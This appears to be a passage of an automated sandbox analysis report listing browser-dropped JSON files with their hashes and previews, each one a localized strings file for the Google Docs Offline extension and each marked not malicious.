                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est. offline. Para utilizar o Google Docs sem uma liga..o . Internet, aceda .s defini..es na p.gina inicial do Google Docs e ative a sincroniza..o offline da pr.xima vez que estiver ligado . Internet.".. },.. "explanationofflineenabled": {.. "message": "Est. offline, mas continua a poder editar os ficheiros dispon.veis ou criar novos ficheiros.".. },.. "extdesc": {.. "message": "Edite, crie e veja os documentos, as folhas de c.lculo e as apresenta..es, tudo sem precisar de aceder . Internet.".. },.. "extname": {.. "message": "Google Docs offline".. },.. "learnmore": {.. "message": "Saber mais".. },.. "popuphelptext": {.. "message": "Escreva edite e colabore onde quer que esteja, com ou sem uma liga..o . Internet.".. }..}..
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):937
                                                                                                                                                                                                                                                      Entropy (8bit):4.686555713975264
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:1HA8dC6e6w+uFPHf2TFMMlecFpweWV4RE:pC6KvHf4plVweCx
                                                                                                                                                                                                                                                      MD5:BED8332AB788098D276B448EC2B33351
                                                                                                                                                                                                                                                      SHA1:6084124A2B32F386967DA980CBE79DD86742859E
                                                                                                                                                                                                                                                      SHA-256:085787999D78FADFF9600C9DC5E3FF4FB4EB9BE06D6BB19DF2EEF8C284BE7B20
                                                                                                                                                                                                                                                      SHA-512:22596584D10707CC1C8179ED3ABE46EF2C314CF9C3D0685921475944B8855AAB660590F8FA1CFDCE7976B4BB3BD9ABBBF053F61F1249A325FD0094E1C95692ED
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "CREEAZ. UN DOCUMENT".. },.. "explanationofflinedisabled": {.. "message": "E.ti offline. Pentru a utiliza Documente Google f.r. conexiune la internet, intr. .n set.rile din pagina principal. Documente Google .i activeaz. sincronizarea offline data viitoare c.nd e.ti conectat(.) la internet.".. },.. "explanationofflineenabled": {.. "message": "E.ti offline, dar po.i .nc. s. editezi fi.ierele disponibile sau s. creezi altele.".. },.. "extdesc": {.. "message": "Editeaz., creeaz. .i acceseaz. documente, foi de calcul .i prezent.ri - totul f.r. acces la internet.".. },.. "extname": {.. "message": "Documente Google Offline".. },.. "learnmore": {.. "message": "Afl. mai multe".. },.. "popuphelptext": {.. "message": "Scrie, editeaz. .i colaboreaz. oriunde ai fi, cu sau f.r. conexiune la internet.".. }..}..
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1337
                                                                                                                                                                                                                                                      Entropy (8bit):4.69531415794894
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:1HABEapHTEmxUomjsfDVs8THjqBK8/hHUg41v+Lph5eFTHQ:I/VdxUomjsre8Kh4Riph5eFU
                                                                                                                                                                                                                                                      MD5:51D34FE303D0C90EE409A2397FCA437D
                                                                                                                                                                                                                                                      SHA1:B4B9A7B19C62D0AA95D1F10640A5FBA628CCCA12
                                                                                                                                                                                                                                                      SHA-256:BE733625ACD03158103D62BC0EEF272CA3F265AC30C87A6A03467481A177DAE3
                                                                                                                                                                                                                                                      SHA-512:E8670DED44DC6EE30E5F41C8B2040CF8A463CD9A60FC31FA70EB1D4C9AC1A3558369792B5B86FA761A21F5266D5A35E5C2C39297F367DAA84159585C19EC492A
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": ".......".. },.. "explanationofflinedisabled": {.. "message": "..... ............ Google ......... ... ........., ............ . .... . ......... ............. . ......-...... . .......... .. ......... .........".. },.. "explanationofflineenabled": {.. "message": "... ........... . .......... .. ...... ......... ..... ..... . ............. .., . ....... ........ ......-.......".. },.. "extdesc": {.. "message": ".........., .............. . ............ ........., ....... . ........... ... ....... . ..........".. },.. "extname": {.. "message": "Google.......... ......".. },.. "learnmore": {.
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):2846
                                                                                                                                                                                                                                                      Entropy (8bit):3.7416822879702547
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:YWi+htQTKEQb3aXQYJLSWy7sTQThQTnQtQTrEmQ6kiLsegQSJFwsQGaiPn779I+S:zhiTK5b3tUGVjTGTnQiTryOLpyaxYf/S
                                                                                                                                                                                                                                                      MD5:B8A4FD612534A171A9A03C1984BB4BDD
                                                                                                                                                                                                                                                      SHA1:F513F7300827FE352E8ECB5BD4BB1729F3A0E22A
                                                                                                                                                                                                                                                      SHA-256:54241EBE651A8344235CC47AFD274C080ABAEBC8C3A25AFB95D8373B6A5670A2
                                                                                                                                                                                                                                                      SHA-512:C03E35BFDE546AEB3245024EF721E7E606327581EFE9EAF8C5B11989D9033BDB58437041A5CB6D567BAA05466B6AAF054C47F976FD940EEEDF69FDF80D79095B
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:{"createnew":{"message":"\u0db1\u0dc0 \u0dbd\u0dda\u0d9b\u0db1\u0dba\u0d9a\u0dca \u0dc3\u0dcf\u0daf\u0db1\u0dca\u0db1"},"explanationofflinedisabled":{"message":"\u0d94\u0db6 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2\u0dba. \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd \u0dc3\u0db8\u0dca\u0db6\u0db1\u0dca\u0db0\u0dad\u0dcf\u0dc0\u0d9a\u0dca \u0db1\u0ddc\u0db8\u0dd0\u0dad\u0dd2\u0dc0 Google Docs \u0db7\u0dcf\u0dc0\u0dd2\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8\u0da7, Google Docs \u0db8\u0dd4\u0dbd\u0dca \u0db4\u0dd2\u0da7\u0dd4\u0dc0 \u0db8\u0dad \u0dc3\u0dd0\u0d9a\u0dc3\u0dd3\u0db8\u0dca \u0dc0\u0dd9\u0dad \u0d9c\u0ddc\u0dc3\u0dca \u0d94\u0db6 \u0d8a\u0dc5\u0d9f \u0d85\u0dc0\u0dc3\u0dca\u0dae\u0dcf\u0dc0\u0dda \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd\u0dba\u0da7 \u0dc3\u0db6\u0dd0\u0db3\u0dd2 \u0dc0\u0dd2\u0da7 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2 \u0dc3\u0db8\u0db8\u0dd4\u0dc4\u0dd4\u0dbb\u0dca\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8 \u0d9a\u0dca\u200d\u0dbb\u0dd2\u0dba\u0dc
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):934
                                                                                                                                                                                                                                                      Entropy (8bit):4.882122893545996
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:1HAF8pMv1RS4LXL22IUjdh8uJwpPqLDEtxKLhSS:hyv1RS4LXx38u36QsS
                                                                                                                                                                                                                                                      MD5:8E55817BF7A87052F11FE554A61C52D5
                                                                                                                                                                                                                                                      SHA1:9ABDC0725FE27967F6F6BE0DF5D6C46E2957F455
                                                                                                                                                                                                                                                      SHA-256:903060EC9E76040B46DEB47BBB041D0B28A6816CB9B892D7342FC7DC6782F87C
                                                                                                                                                                                                                                                      SHA-512:EFF9EC7E72B272DDE5F29123653BC056A4BC2C3C662AE3C448F8CB6A4D1865A0679B7E74C1B3189F3E262109ED6BC8F8D2BDE14AEFC8E87E0F785AE4837D01C7
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "VYTVORI. NOV.".. },.. "explanationofflinedisabled": {.. "message": "Ste offline. Ak chcete pou.i. Dokumenty Google bez pripojenia na internet, po najbli..om pripojen. na internet prejdite do nastaven. na domovskej str.nke Dokumentov Google a.zapnite offline synchroniz.ciu.".. },.. "explanationofflineenabled": {.. "message": "Ste offline, no st.le m..ete upravova. dostupn. s.bory a.vytv.ra. nov..".. },.. "extdesc": {.. "message": ".prava, tvorba a.zobrazenie dokumentov, tabuliek a.prezent.ci.. To v.etko bez pr.stupu na internet.".. },.. "extname": {.. "message": "Dokumenty Google v re.ime offline".. },.. "learnmore": {.. "message": ".al.ie inform.cie".. },.. "popuphelptext": {.. "message": "P..te, upravujte a.spolupracuje, kdeko.vek ste, a.to s.pripojen.m na internet aj bez neho.".. }..}..
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):963
                                                                                                                                                                                                                                                      Entropy (8bit):4.6041913416245
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:1HASvgfECBxNFCEuKXowwJrpvPwNgEcPJJJEfWOCBxeFCJuGuU4KYXCSUXKDxX4A:1HAXMKYw8VYNLcaeDmKYLdX2zJBG5
                                                                                                                                                                                                                                                      MD5:BFAEFEFF32813DF91C56B71B79EC2AF4
                                                                                                                                                                                                                                                      SHA1:F8EDA2B632610972B581724D6B2F9782AC37377B
                                                                                                                                                                                                                                                      SHA-256:AAB9CF9098294A46DC0F2FA468AFFF7CA7C323A1A0EFA70C9DB1E3A4DA05D1D4
                                                                                                                                                                                                                                                      SHA-512:971F2BBF5E9C84DE3D31E5F2A4D1A00D891A2504F8AF6D3F75FC19056BFD059A270C4C9836AF35258ABA586A1888133FB22B484F260C1CBC2D1D17BC3B4451AA
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "USTVARI NOVO".. },.. "explanationofflinedisabled": {.. "message": "Nimate vzpostavljene povezave. .e .elite uporabljati Google Dokumente brez internetne povezave, odprite nastavitve na doma.i strani Google Dokumentov in vklopite sinhronizacijo brez povezave, ko naslednji. vzpostavite internetno povezavo.".. },.. "explanationofflineenabled": {.. "message": "Nimate vzpostavljene povezave, vendar lahko .e vedno urejate razpolo.ljive datoteke ali ustvarjate nove.".. },.. "extdesc": {.. "message": "Urejajte, ustvarjajte in si ogledujte dokumente, preglednice in predstavitve . vse to brez internetnega dostopa.".. },.. "extname": {.. "message": "Google Dokumenti brez povezave".. },.. "learnmore": {.. "message": "Ve. o tem".. },.. "popuphelptext": {.. "message": "Pi.ite, urejajte in sodelujte, kjer koli ste, z internetno povezavo ali brez nje.".. }..}..
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1320
                                                                                                                                                                                                                                                      Entropy (8bit):4.569671329405572
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:1HArg/fjQg2JwrfZtUWTrw1P4epMnRGi5TBmuPDRxZQ/XtiCw/Rwh/Q9EVz:ogUg2JwDZe6rwKI8VTP9xK1CwhI94
                                                                                                                                                                                                                                                      MD5:7F5F8933D2D078618496C67526A2B066
                                                                                                                                                                                                                                                      SHA1:B7050E3EFA4D39548577CF47CB119FA0E246B7A4
                                                                                                                                                                                                                                                      SHA-256:4E8B69E864F57CDDD4DC4E4FAF2C28D496874D06016BC22E8D39E0CB69552769
                                                                                                                                                                                                                                                      SHA-512:0FBAB56629368EEF87DEEF2977CA51831BEB7DEAE98E02504E564218425C751853C4FDEAA40F51ECFE75C633128B56AE105A6EB308FD5B4A2E983013197F5DBA
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "....... ....".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. ..... ......... Google ......... ... ........ ...., ..... . .......... .. ........ ........ Google .......... . ........ ...... .............. ... ....... ... ...... ........ .. ...........".. },.. "explanationofflineenabled": {.. "message": "...... ..., ... . .... ...... .. ....... ...... . ........ ........ ... .. ....... .....".. },.. "extdesc": {.. "message": "....... . ........... ........., ...... . ............ . ....... ...... . ... . ... .. ... ........ .........".. },.. "extname": {.. "message
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):884
                                                                                                                                                                                                                                                      Entropy (8bit):4.627108704340797
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:1HA0NOYT/6McbnX/yzklyOIPRQrJlvDymvBd:vNOcyHnX/yg0P4Bymn
                                                                                                                                                                                                                                                      MD5:90D8FB448CE9C0B9BA3D07FB8DE6D7EE
                                                                                                                                                                                                                                                      SHA1:D8688CAC0245FD7B886D0DEB51394F5DF8AE7E84
                                                                                                                                                                                                                                                      SHA-256:64B1E422B346AB77C5D1C77142685B3FF7661D498767D104B0C24CB36D0EB859
                                                                                                                                                                                                                                                      SHA-512:6D58F49EE3EF0D3186EA036B868B2203FE936CE30DC8E246C32E90B58D9B18C624825419346B62AF8F7D61767DBE9721957280AA3C524D3A5DFB1A3A76C00742
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "SKAPA NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du .r offline. Om du vill anv.nda Google Dokument utan internetuppkoppling, .ppna inst.llningarna p. Google Dokuments startsida och aktivera offlinesynkronisering n.sta g.ng du .r ansluten till internet.".. },.. "explanationofflineenabled": {.. "message": "Du .r offline, men det g.r fortfarande att redigera tillg.ngliga filer eller skapa nya.".. },.. "extdesc": {.. "message": "Redigera, skapa och visa dina dokument, kalkylark och presentationer . helt utan internet.tkomst.".. },.. "extname": {.. "message": "Google Dokument Offline".. },.. "learnmore": {.. "message": "L.s mer".. },.. "popuphelptext": {.. "message": "Skriv, redigera och samarbeta .verallt, med eller utan internetanslutning.".. }..}..
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):980
                                                                                                                                                                                                                                                      Entropy (8bit):4.50673686618174
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:1HASvgNHCBxNx1HMHyMhybK7QGU78oCuafIvfCBxex6EYPE5E1pOCSUJqONtCBh8:1HAGDQ3y0Q/Kjp/zhDoKMkeAT6dBaX
                                                                                                                                                                                                                                                      MD5:D0579209686889E079D87C23817EDDD5
                                                                                                                                                                                                                                                      SHA1:C4F99E66A5891973315D7F2BC9C1DAA524CB30DC
                                                                                                                                                                                                                                                      SHA-256:0D20680B74AF10EF8C754FCDE259124A438DCE3848305B0CAF994D98E787D263
                                                                                                                                                                                                                                                      SHA-512:D59911F91ED6C8FF78FD158389B4D326DAF4C031B940C399569FE210F6985E23897E7F404B7014FC7B0ACEC086C01CC5F76354F7E5D3A1E0DEDEF788C23C2978
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "FUNGUA MPYA".. },.. "explanationofflinedisabled": {.. "message": "Haupo mtandaoni. Ili uweze kutumia Hati za Google bila muunganisho wa intaneti, wakati utakuwa umeunganishwa kwenye intaneti, nenda kwenye sehemu ya mipangilio kwenye ukurasa wa kwanza wa Hati za Google kisha uwashe kipengele cha usawazishaji nje ya mtandao.".. },.. "explanationofflineenabled": {.. "message": "Haupo mtandaoni, lakini bado unaweza kubadilisha faili zilizopo au uunde mpya.".. },.. "extdesc": {.. "message": "Badilisha, unda na uangalie hati, malahajedwali na mawasilisho yako . yote bila kutumia muunganisho wa intaneti.".. },.. "extname": {.. "message": "Hati za Google Nje ya Mtandao".. },.. "learnmore": {.. "message": "Pata Maelezo Zaidi".. },.. "popuphelptext": {.. "message": "Andika hati, zibadilishe na ushirikiane na wengine popote ulipo, iwe una muunganisho wa intaneti au huna.".. }..}..
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1941
                                                                                                                                                                                                                                                      Entropy (8bit):4.132139619026436
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:1HAoTZwEj3YfVLiANpx96zjlXTwB4uNJDZwq3CP1B2xIZiIH1CYFIZ03SoFyxrph:JCEjWiAD0ZXkyYFyPND1L/I
                                                                                                                                                                                                                                                      MD5:DCC0D1725AEAEAAF1690EF8053529601
                                                                                                                                                                                                                                                      SHA1:BB9D31859469760AC93E84B70B57909DCC02EA65
                                                                                                                                                                                                                                                      SHA-256:6282BF9DF12AD453858B0B531C8999D5FD6251EB855234546A1B30858462231A
                                                                                                                                                                                                                                                      SHA-512:6243982D764026D342B3C47C706D822BB2B0CAFFA51F0591D8C878F981EEF2A7FC68B76D012630B1C1EB394AF90EB782E2B49329EB6538DD5608A7F0791FDCF5
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "..... ....... .........".. },.. "explanationofflinedisabled": {.. "message": ".......... ........... .... ....... ..... Google ......... .........., ...... .... ........... ......... ...., Google ... ................... ................ ......, ........ ......... ..........".. },.. "explanationofflineenabled": {.. "message": ".......... ..........., .......... .......... .......... ......... ........... ...... .....
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1969
                                                                                                                                                                                                                                                      Entropy (8bit):4.327258153043599
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:R7jQrEONienBcFNBNieCyOBw0/kCcj+sEf24l+Q+u1LU4ljCj55ONipR41ssrNix:RjQJN1nBcFNBNlCyGcj+RXl+Q+u1LU4s
                                                                                                                                                                                                                                                      MD5:385E65EF723F1C4018EEE6E4E56BC03F
                                                                                                                                                                                                                                                      SHA1:0CEA195638A403FD99BAEF88A360BD746C21DF42
                                                                                                                                                                                                                                                      SHA-256:026C164BAE27DBB36A564888A796AA3F188AAD9E0C37176D48910395CF772CEA
                                                                                                                                                                                                                                                      SHA-512:E55167CB5638E04DF3543D57C8027B86B9483BFCAFA8E7C148EDED66454AEBF554B4C1CF3C33E93EC63D73E43800D6A6E7B9B1A1B0798B6BDB2F699D3989B052
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "..... ...... ........ ......".. },.. "explanationofflinedisabled": {.. "message": ".... ........... ........ ......... ........ ....... Google Docs... .............., .... ............ ....... ..... ...... .... Google Docs .... ...... ............. ......, ........ ........ ... .......".. },.. "explanationofflineenabled": {.. "message": ".... ........... ......., .... .... ........ .......... .... ....... ..... ....... .... ..
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1674
                                                                                                                                                                                                                                                      Entropy (8bit):4.343724179386811
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:fcGjnU3UnGKD1GeU3pktOggV1tL2ggG7Q:f3jnDG1eUk0g6RLE
                                                                                                                                                                                                                                                      MD5:64077E3D186E585A8BEA86FF415AA19D
                                                                                                                                                                                                                                                      SHA1:73A861AC810DABB4CE63AD052E6E1834F8CA0E65
                                                                                                                                                                                                                                                      SHA-256:D147631B2334A25B8AA4519E4A30FB3A1A85B6A0396BC688C68DC124EC387D58
                                                                                                                                                                                                                                                      SHA-512:56DD389EB9DD335A6214E206B3BF5D63562584394D1DE1928B67D369E548477004146E6CB2AD19D291CB06564676E2B2AC078162356F6BC9278B04D29825EF0C
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": ".............. ............. Google .................................... ............................... Google ...... .................................................................".. },.. "explanationofflineenabled": {.. "message": "................................................................".. },.. "extdesc": {.. "message": "..... ..... ........
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1063
                                                                                                                                                                                                                                                      Entropy (8bit):4.853399816115876
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:1HAowYuBPgoMC4AGehrgGm7tJ3ckwFrXnRs5m:GYsPgrCtGehkGc3cvXr
                                                                                                                                                                                                                                                      MD5:76B59AAACC7B469792694CF3855D3F4C
                                                                                                                                                                                                                                                      SHA1:7C04A2C1C808FA57057A4CCEEE66855251A3C231
                                                                                                                                                                                                                                                      SHA-256:B9066A162BEE00FD50DC48C71B32B69DFFA362A01F84B45698B017A624F46824
                                                                                                                                                                                                                                                      SHA-512:2E507CA6874DE8028DC769F3D9DFD9E5494C268432BA41B51568D56F7426F8A5F2E5B111DDD04259EB8D9A036BB4E3333863A8FC65AAB793BCEF39EDFE41403B
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "YEN. OLU.TUR".. },.. "explanationofflinedisabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Google Dok.manlar'. .nternet ba.lant.s. olmadan kullanmak i.in, .nternet'e ba.lanabildi.inizde Google Dok.manlar ana sayfas.nda Ayarlar'a gidin ve .evrimd... senkronizasyonu etkinle.tirin.".. },.. "explanationofflineenabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Ancak, yine de mevcut dosyalar. d.zenleyebilir veya yeni dosyalar olu.turabilirsiniz.".. },.. "extdesc": {.. "message": "Dok.man, e-tablo ve sunu olu.turun, bunlar. d.zenleyin ve g.r.nt.leyin. T.m bu i.lemleri internet eri.imi olmadan yapabilirsiniz.".. },.. "extname": {.. "message": "Google Dok.manlar .evrimd...".. },.. "learnmore": {.. "message": "Daha Fazla Bilgi".. },.. "popuphelptext": {.. "message": ".nternet ba.lant.n.z olsun veya olmas.n, nerede olursan.z olun yaz.n, d.zenl
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1333
                                                                                                                                                                                                                                                      Entropy (8bit):4.686760246306605
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:1HAk9oxkm6H4KyGGB9GeGoxPEYMQhpARezTtHUN97zlwpEH7:VKU1GB9GeBc/OARETt+9/WCb
                                                                                                                                                                                                                                                      MD5:970963C25C2CEF16BB6F60952E103105
                                                                                                                                                                                                                                                      SHA1:BBDDACFEEE60E22FB1C130E1EE8EFDA75EA600AA
                                                                                                                                                                                                                                                      SHA-256:9FA26FF09F6ACDE2457ED366C0C4124B6CAC1435D0C4FD8A870A0C090417DA19
                                                                                                                                                                                                                                                      SHA-512:1BED9FE4D4ADEED3D0BC8258D9F2FD72C6A177C713C3B03FC6F5452B6D6C2CB2236C54EA972ECE7DBFD756733805EB2352CAE44BAB93AA8EA73BB80460349504
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "........".. },.. "explanationofflinedisabled": {.. "message": ".. . ...... ....... ... ............. Google ........... ... ......... . .........., ......... . ............ .. ........ ........ Google .......... . ......... ......-............., .... ...... . .......".. },.. "explanationofflineenabled": {.. "message": ".. . ...... ......, ..... ... .... ...... .......... ........ ..... ... .......... .....".. },.. "extdesc": {.. "message": "........., ......... . ............ ........., .......... ....... .. ........... ... ....... .. ..........".. },.. "extname": {.. "message": "Goo
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1263
                                                                                                                                                                                                                                                      Entropy (8bit):4.861856182762435
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:1HAl3zNEUhN3mNjkSIkmdNpInuUVsqNtOJDhY8Dvp/IkLzx:e3uUhQKvkmd+s11Lp1F
                                                                                                                                                                                                                                                      MD5:8B4DF6A9281333341C939C244DDB7648
                                                                                                                                                                                                                                                      SHA1:382C80CAD29BCF8AAF52D9A24CA5A6ECF1941C6B
                                                                                                                                                                                                                                                      SHA-256:5DA836224D0F3A96F1C5EB5063061AAD837CA9FC6FED15D19C66DA25CF56F8AC
                                                                                                                                                                                                                                                      SHA-512:FA1C015D4EA349F73468C78FDB798D462EEF0F73C1A762298798E19F825E968383B0A133E0A2CE3B3DF95F24C71992235BFC872C69DC98166B44D3183BF8A9E5
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "... ......".. },.. "explanationofflinedisabled": {.. "message": ".. .. .... .... Google Docs .. .... ....... ..... ....... .... ..... .... ... .. .. ....... .. ..... ... .. Google Docs ... ... .. ....... .. ..... ... .. .... ...... ..... .. .. .....".. },.. "explanationofflineenabled": {.. "message": ".. .. .... ... .... .. ... ... ...... ..... ... ..... .. .... ... .. ... ..... ... .... ....".. },.. "extdesc": {.. "message": ".......... .......... ... ....... . .... ... ....... .. ..... .. .... ...... ..... .... ... ..... .......".. },.. "extname": {.. "message": "Google Docs .. ....".. },.. "learnmore": {..
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1074
                                                                                                                                                                                                                                                      Entropy (8bit):5.062722522759407
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:1HAhBBLEBOVUSUfE+eDFmj4BLErQ7e2CIer32KIxqJ/HtNiE5nIGeU+KCVT:qHCDheDFmjDQgX32/S/hI9jh
                                                                                                                                                                                                                                                      MD5:773A3B9E708D052D6CBAA6D55C8A5438
                                                                                                                                                                                                                                                      SHA1:5617235844595D5C73961A2C0A4AC66D8EA5F90F
                                                                                                                                                                                                                                                      SHA-256:597C5F32BC999746BC5C2ED1E5115C523B7EB1D33F81B042203E1C1DF4BBCAFE
                                                                                                                                                                                                                                                      SHA-512:E5F906729E38B23F64D7F146FA48F3ABF6BAED9AAFC0E5F6FA59F369DC47829DBB4BFA94448580BD61A34E844241F590B8D7AEC7091861105D8EBB2590A3BEE9
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "T.O M.I".. },.. "explanationofflinedisabled": {.. "message": "B.n .ang ngo.i tuy.n. .. s. d.ng Google T.i li.u m. kh.ng c.n k.t n.i Internet, .i ..n c.i ..t tr.n trang ch. c.a Google T.i li.u v. b.t ..ng b. h.a ngo.i tuy.n v.o l.n ti.p theo b.n ...c k.t n.i v.i m.ng Internet.".. },.. "explanationofflineenabled": {.. "message": "B.n .ang ngo.i tuy.n, tuy nhi.n b.n v.n c. th. ch.nh s.a c.c t.p c. s.n ho.c t.o c.c t.p m.i.".. },.. "extdesc": {.. "message": "Ch.nh s.a, t.o v. xem t.i li.u, b.ng t.nh v. b.n tr.nh b.y . t.t c. m. kh.ng c.n truy c.p Internet.".. },.. "extname": {.. "message": "Google T.i li.u ngo.i tuy.n".. },.. "learnmore": {.. "message": "Ti.m hi..u th.m".. },.. "popuphelptext": {.. "message": "Vi.t, ch.nh s.a v. c.ng t.c
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):879
                                                                                                                                                                                                                                                      Entropy (8bit):5.7905809868505544
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:1HASvgteHCBxNtSBXuetOrgIkA2OrWjMOCBxetSBXK01fg/SOiCSUEQ27e1CBhUj:1HAFsHtrIkA2jqldI/727eggcLk9pf
                                                                                                                                                                                                                                                      MD5:3E76788E17E62FB49FB5ED5F4E7A3DCE
